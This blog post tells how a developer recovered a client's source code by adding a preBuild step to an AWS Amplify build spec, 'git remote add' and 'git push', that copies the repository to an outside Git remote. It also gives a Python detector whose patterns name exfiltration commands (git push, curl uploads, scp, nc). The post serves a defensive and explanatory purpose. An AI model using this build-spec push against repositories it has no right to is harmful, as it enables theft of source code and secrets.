
The day I recovered the company's source code

Abílio Azevedo

I wrote this article for the Revelo community. You can access it in Portuguese here. The English version is below.

TLDR

This article describes how I recovered the lost source code of a company whose site was deployed on AWS Amplify. Amplify checks the code out of the connected Git repository in order to build it, so editing the app's build settings (the amplify.yml build spec) was enough to add a pre-build step that pushed the whole repository, history included, to a Git remote we controlled. We will look at how Amplify works, what the repository authorization grants, and why that means anyone who can edit build settings in the AWS account can read the source at build time.

As developers, we run into hassles on a daily basis. A company contacted me for some freelance "small tweaks", but they didn't have access to the source code written by the previous developer 😅. So, would you take on the project? Tell them to start from scratch? Try to recover the source code?

Scenario

The source code lived in a GitHub repository and was deployed on AWS through Amplify. We didn't have access to the repository, but we did have access to the AWS dashboard.

Theory

At some point the code has to leave GitHub and reach AWS to be built and hosted, so there is a point at which we can get at it. There is light at the end of the tunnel!

What is AWS Amplify?

AWS Amplify is a set of tools and services that allow developers to build scalable and secure applications in the cloud. It provides an easy-to-use interface to manage backend and frontend resources, including authentication, APIs, storage, and hosting.

You start using Amplify Hosting by connecting the repository that holds your source code.

[Image: Amplify hosting]

Notice that you have to authorize AWS Amplify to read your code and to write the amplify.yml file. That file controls the build and deploy process in Amplify and can be customized to meet specific project needs.

[Image: Amplify installation]

Source Code Recovery

As we have seen, the source code is exposed to AWS Amplify so that it can be built. The lesson for you as a developer: don't connect your repository to any account you don't control, because that account's build pipeline reads your code. The build spec runs against a full checkout of the repository, together with any environment variables configured for the app, so anyone allowed to edit the app's build settings (in IAM terms, amplify:UpdateApp or amplify:UpdateBranch, which set the build spec) and trigger a build can copy both out. In this case, the previous developer believed his code was inaccessible because nobody else had the GitHub repository. We know this is not true.

The build settings live in a YAML file (amplify.yml) and can be edited either from the AWS dashboard or in the repository itself, as the following image shows:

[Image: Amplify build settings]

As I didn't have access to the repository, I modified this file through the AWS dashboard the company had access to, and added a step before the build that pushed all the code to an empty Git repository, thus keeping the entire history of code changes.

```yaml
version: 1
frontend:
  phases:
    preBuild:
      commands:
        - echo 'Sending source code to the alternate Git repository'
        # The remote must accept unattended pushes from the build host, e.g.
        # an HTTPS URL carrying a token; keep that URL out of the repository.
        - git remote add alternate-repo <ALTERNATE_REPOSITORY_URL>
        # Push the branch Amplify checked out (AWS_BRANCH is set by Amplify),
        # which carries every commit reachable from it.
        - git push alternate-repo HEAD:refs/heads/$AWS_BRANCH
```

With this we found out that the developer was outsourcing the service to someone else 🤡.

Note: if outsourcing was authorized in the contract, everything is fine. The guy went silent when he found out we had been able to access the source code. But that's it, folks: pay attention to the possibilities, and understand how the tools work and their concepts so you can use them in the best way and get out of hassles like this, always ethically.
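The same build-spec edit that recovered the code here would, in other hands, be source-code theft, so the defensive counterpart is to watch for build-spec changes that contain push or upload commands. The script below is an added example written for this post, not AWS or Amplify code: it scans CloudTrail-style records of Amplify UpdateApp/UpdateBranch calls and flags build specs whose commands can move the checkout off the build host. The events, specs, ARNs and app ID are constructed; the buildSpec field name follows the Amplify UpdateApp API, but the rest of the record layout is an assumption.

```python
"""Flag Amplify build-spec changes that can copy the checked-out source off
the build host. Added example for this post, not AWS/Amplify code; the
CloudTrail-style events below are constructed."""
import json
import re

# Commands a build rarely needs that can move repository contents or history
# elsewhere. Tuned to this post's case; curl/wget without upload flags pass.
EXFIL_PATTERNS = [
    re.compile(r"\bgit\s+(remote\s+add|push|bundle)\b"),
    re.compile(r"\b(curl|wget)\b.*\s(-d|--data\S*|-T|--upload-file|-F)\s"),
    re.compile(r"\b(scp|rsync|sftp)\b"),
    re.compile(r"\baws\s+s3\s+(cp|sync)\b"),
    re.compile(r"\b(tar|zip)\b.*\|\s*(curl|nc)\b"),
]
# Amplify API calls whose request can carry a buildSpec.
SPEC_SETTING_CALLS = {"CreateApp", "UpdateApp", "CreateBranch", "UpdateBranch"}


def build_commands(build_spec):
    """Return each `- ` item under any `commands:` key (no YAML lib needed)."""
    commands, in_commands, block_indent = [], False, 0
    for raw in build_spec.splitlines():
        stripped = raw.strip()
        if not stripped or stripped.startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip())
        if stripped == "commands:":
            in_commands, block_indent = True, indent
        elif in_commands and stripped.startswith("- ") and indent >= block_indent:
            item = stripped[2:].strip()
            if len(item) > 1 and item[0] == item[-1] and item[0] in "'\"":
                item = item[1:-1]  # unwrap a fully quoted command
            commands.append(item)
        elif in_commands and indent <= block_indent:
            in_commands = False  # a sibling key ends the commands list
    return commands


def suspicious_commands(build_spec):
    """Commands in the spec matching an exfiltration pattern."""
    return [c for c in build_commands(build_spec)
            if any(p.search(c) for p in EXFIL_PATTERNS)]


def scan_events(events):
    """One finding per Amplify call that installs a suspicious build spec."""
    findings = []
    for event in events:
        if (event.get("eventSource") != "amplify.amazonaws.com"
                or event.get("eventName") not in SPEC_SETTING_CALLS):
            continue
        params = event.get("requestParameters") or {}
        hits = suspicious_commands(params.get("buildSpec") or "")
        if hits:
            findings.append({
                "eventTime": event.get("eventTime"),
                "eventName": event["eventName"],
                "actor": (event.get("userIdentity") or {}).get("arn"),
                "appId": params.get("appId"),
                "commands": hits,
            })
    return findings


# Constructed specs in Amplify's layout; EXFIL_SPEC adds this post's preBuild.
CLEAN_SPEC = """\
version: 1
frontend:
  phases:
    build:
      commands:
        - npm ci
        - npm run build
"""
EXFIL_SPEC = CLEAN_SPEC.replace("    build:\n", """\
    preBuild:
      commands:
        - echo 'Sending source code to the alternate repository'
        - git remote add alternate-repo https://git.example.invalid/recovery.git
        - git push alternate-repo HEAD:refs/heads/main
    build:
""")

# Constructed CloudTrail-style records; ARNs and the app ID are placeholders.
SAMPLE_EVENTS = [
    {"eventTime": "2024-05-01T10:00:00Z", "eventSource": "s3.amazonaws.com",
     "eventName": "PutObject", "requestParameters": {"bucketName": "assets"}},
    {"eventTime": "2024-05-01T10:05:00Z", "eventSource": "amplify.amazonaws.com",
     "eventName": "UpdateApp",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/release-bot"},
     "requestParameters": {"appId": "d1example", "buildSpec": CLEAN_SPEC}},
    {"eventTime": "2024-05-01T10:09:00Z", "eventSource": "amplify.amazonaws.com",
     "eventName": "UpdateApp",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/console-user"},
     "requestParameters": {"appId": "d1example", "buildSpec": EXFIL_SPEC}},
]

if __name__ == "__main__":
    print(json.dumps(scan_events(SAMPLE_EVENTS), indent=2))
```

Run it as a script and it prints the single finding for the console user's change. The pattern list is deliberately narrow (a `curl ... | sh` install step is not flagged) so the rule can run on every build-spec event without drowning in noise; pair it with an IAM policy that keeps amplify:UpdateApp and amplify:UpdateBranch away from users who only need to view the app.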

That is all, folks!



Experienced Software Engineer with a degree in Electrical Engineering and over 8 years of hands-on expertise in building robust and scalable mobile, web and backend applications across various projects, mainly in the fintech sector. Mobile (React Native), Web (React and Next.js) and Backend (Node.js, PHP and Django). My goal is to create products that add value to people. - © 2024, Abílio Azevedo